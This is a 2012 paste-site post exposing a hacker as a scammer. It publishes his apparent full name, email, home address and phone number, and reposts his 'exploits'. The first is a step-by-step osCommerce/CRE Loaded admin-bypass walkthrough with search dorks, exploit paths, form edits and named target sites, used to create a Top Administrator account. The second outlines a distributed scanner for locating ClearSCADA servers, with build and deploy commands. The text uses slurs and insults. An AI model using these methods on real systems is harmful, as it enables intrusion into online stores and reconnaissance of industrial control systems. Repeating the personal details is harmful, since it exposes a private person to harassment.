Don't like ads? PRO users don't see any ads ;-)

Hex00010 Scammer! (Includes DoX + Exploits)

By: Reck on May 24th, 2012  |  syntax: None  |  size: 6.65 KB  |  hits: 3,635  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. Hello there, world.
  2.  
  3. So, Hex00010 got kicked outta TeamP0isoN for buttfuckin' horny chicks in a Burger King's Bathroom, Just kidding, He got kicked out of TeamP0isoN for continously scamming people.
  4.  
  5.  
  6.  
  7. ---------Hex000101's DoX (http://pastebin.com/zNmFmm59)-------
  8.  
  9. Name: William Premore
  10.  
  11. Email: william.premore@gmail.com
  12.  
  13. Address: 321 W Forest Pittsburg, KS 66762
  14.  
  15. Tel: +14177936577
  16.  
  17. -----------------------------------------------------------------------------------
  18.  
  19. He's selling exploits, do not BUY from him. He has scammed 20+ people.
  20.  
  21. He said he got 1337 0day exploits for Scada & OsCommerence, and he said he's selling them.
  22.  
  23. Such a pathetic liar, isn't he?
  24.  
  25. Do not BUY shit from him, My friend payed him $250 for the 0day exploits, and he didn't gave him shit, he said he had a shell on a credit-card processing server, he gave him, but it was dead, then my friend started messaging him about it, and he doesn't replies.
  26.  
  27. Here are his so-called '0day' exploits. Enjoy, folks.
  28.  
  29. -----------------------------------------------------------------------------
  30.  
  31. twitter.com/Reckz0r - @Reckz0r - My twitter feed! (Follow for the exposure of cunts)
  32. ----------------------------------------------------------------------------
  33.  
  34. Contact me for the Scada Files for exploiting Scada Websites.
  35.  
  36. His LR: U0164888
  37.  
  38. He's a scammer. Do not BUY shit from him.
  39.  
  40. #FuckScammers
  41. #Pwnage
  42. #OpBangarang
  43.  
  44. *************************************************************************************
  45.  
  46. #1 - OsCommerence (He stole this exploit, Original: http://wasimasif.wordpress.com/2010/05/23/oscommerce-security-exploit-allows-access-to-admin-without-password/)
  47.  
  48. "/*
  49. *
  50. *       TeaMp0ison Run's This Shit Nigga
  51. *
  52. * Found By:  Hex00010  ~  TeaMp0ison ~ Bitches
  53. *
  54. *
  55. */
  56. Using Version CRE Loaded PCI B2B v6.4.1
  57. Using Version CRE Loaded Professional v6.3
  58. Copyright © 2008 osCommerce and The Template Shop
  59. 2006 CRE Loaded Project
  60. Using Version CRE Loaded v6.2
  61. Using Version CRE Loaded PCI Pro v6.4.1
  62. Using Version CRE Loaded PCI Pro v6.4
  63. The best dork -> intitle:"CRE Loaded 6"
  64. Using Version CRE Loaded v6.2 B2B
  65. inurl:"information.php?info_
  66. id="
  67. "intext:Powered by Oscommerce Supercharged by CRE Loaded"
  68.  
  69. ---------------------------------
  70.  
  71. Exploit paths:
  72.  
  73.  
  74. *admin_members.php/login.php
  75.  
  76. *administrators.php/login.php
  77.  
  78. *admin_users.php/login.php
  79.  
  80. ----------------------------
  81.  
  82. Method:
  83.  
  84. for example: www.littleelves.com this our target.
  85.  
  86.  
  87. we go to: www.littleelves.com/admin/
  88.  
  89. you will get http://www.littleelves.com/admin/login.php?osCAdminID=80b8cd584fff0a7bb10374446b35987a
  90.  
  91. Remove  "login.php?osCAdminID=80b8cd584fff0a7bb10374446b35987a" and put "admin_members.php/login.php" instead.
  92.  
  93. after that you will get a page has "TEXT_INFO_HEADING_DEFAULT"
  94.  
  95. Now add this to the URL: http://www.littleelves.com/admin/admin_members.php/login.php?action=new_member
  96.  
  97. not we just added "?action=new_member"
  98.  
  99. after that .. in the same web browser right click then "View source".
  100.  
  101. Copy the source of the current page. and search for word "post".
  102.  
  103. you will find the line will be like this:
  104.  
  105. <form name="newmember" action="http://solarenergyworksstore.com/admin/admin_members.php?action=member_new&page=mID=&osCAdminID=54ebf8c481a5963b75f9e0014503856f" method="post" enctype="multipart/form-data">
  106.  
  107.  
  108. Change it to
  109.  
  110. <form name="newmember" action="http://solarenergyworksstore.com/admin/admin_members.php/login.php?action=member_new&page=mID=&osCAdminID=54ebf8c481a5963b75f9e0014503856f" method="post" enctype="multipart/form-data">
  111.  
  112. Then fill these options:
  113.  
  114.  TEXT_INFO_FIRSTNAME: admin
  115.  TEXT_INFO_LASTNAME: Support
  116.  TEXT_INFO_EMAIL: Put your Email here so you can receive the password.
  117.  TEXT_INFO_GROUP: Top Administrator
  118.  
  119. then click on "Insert".
  120.  
  121. after you clicking Insert. go to your email inbox. you will find a new email "New Password". then you will be able to log in. :)
  122.  
  123. that's the exploit is all about."
  124.  
  125. #2 - Scada
  126.  
  127.  
  128. "/**
  129.  *  ClearScada Exploit   -  Finder - 2012 - DO NOT SHARE
  130.  *  International SCADA Exploit Finder
  131.  *  Status: Public
  132.  *  
  133.  *  Programmed by: Hex00010
  134.  *  
  135.  */
  136.  
  137. Hello everyone
  138.  
  139. Today i present you with the  SCADA Exploit that  can find  Servers   using the  ClearSCADA   product.
  140.  
  141. this is a demonstration proof of concept exploit - this exploit  is  more  informational - Unauthentication
  142. it uses a  client/server.
  143.  
  144. this exploit is in response to the  SCADA EXPLOITS - Hex00010 - Water - Power Plant  located here
  145.  
  146. http://pastebin.com/SjHSWfkV
  147.  
  148.  
  149.  
  150. Server -> reads  5,000 ip's at a  time - once those  5k are up it loads a  new set  of  5k ( also can run multiple ip's if configured through the server correctly for Parallel Data Processing
  151.  
  152. opcode 0 - request a server
  153. opcode 1 - the servers result (0 for invalid, 1 for valid)
  154.  
  155. Opens Port on : 8081
  156.  
  157. Each server  has its own pre-defined  ip list
  158.  
  159.  
  160.  
  161. Server Machine 1:  host  100mb of  ip's
  162. Server Machine 2:  host  600mb of  ip's
  163.  
  164.  
  165.  
  166. Client Machine 1 -> connects to  host 1  - Scans  5k  - ends  - restarts  - if found valid -> print - else - continue - end
  167.  
  168. Client Machine 2 -> connects to  host 1  - Scans  5k  - ends  - restarts  - if found valid -> print - else - continue - end
  169.  
  170. Each machine scans its own subnet
  171.  
  172.  
  173. Supports  Server Clustering  to maximize scanning times
  174.  
  175.  
  176. Supports  SSL  Scanning
  177.  
  178. -----------------------------------------------------------------------------------------------------------
  179.  
  180.  
  181.  
  182.  
  183. Client  ->
  184.  
  185. Reads IP Addresses from the server  and  displays if there valid or not in a file
  186. Reads  Server  Header Information
  187.  
  188.  
  189.  
  190.  
  191.  
  192.  
  193.  
  194. Features:
  195.                        
  196. Server - Pools the clients, Accepts unlimited connections, Queues the server ip list.
  197. Client - Asynchronous processing - Request an ip whilst the other threads are processing. Checks the header for clearscada.
  198. == SETUP ==
  199. In main directory, for the CLIENT
  200. Edit src/ServerConnection.java
  201. Change 127.0.0.1 to the SERVERS ip. Save.
  202. Go back to the parent of src
  203. Make folder bin
  204.  
  205. javac -d bin src/*.java
  206.  
  207. == Copy contents of 'bin' to the shells / servers you want to set up the thread on ==
  208. java -Xmx512m ScadaMain [THREADS]
  209.  
  210. == For the SERVER ==
  211. In the 'Server' directory make bin folder
  212. javac -d bin src/*.java
  213.  
  214. == Copy contents of bin to the main server ==
  215. [sudo ]java -Xmx2048m Server
  216.  
  217.  
  218.  
  219. --------------------------------------------------------------------------------------------------------------
  220.  
  221.  
  222. Run IPGen  to generate  all of the ip addresses  - writes to  ip's.txt"
  223.  
  224. *********************************************************************************
  225.  
  226. Bitches gonna get exposed.
  227. Don't scam.
  228. Be original.
  229.  
  230. twitter.com/Reckz0r
  231. Stay tuned for more bullshit.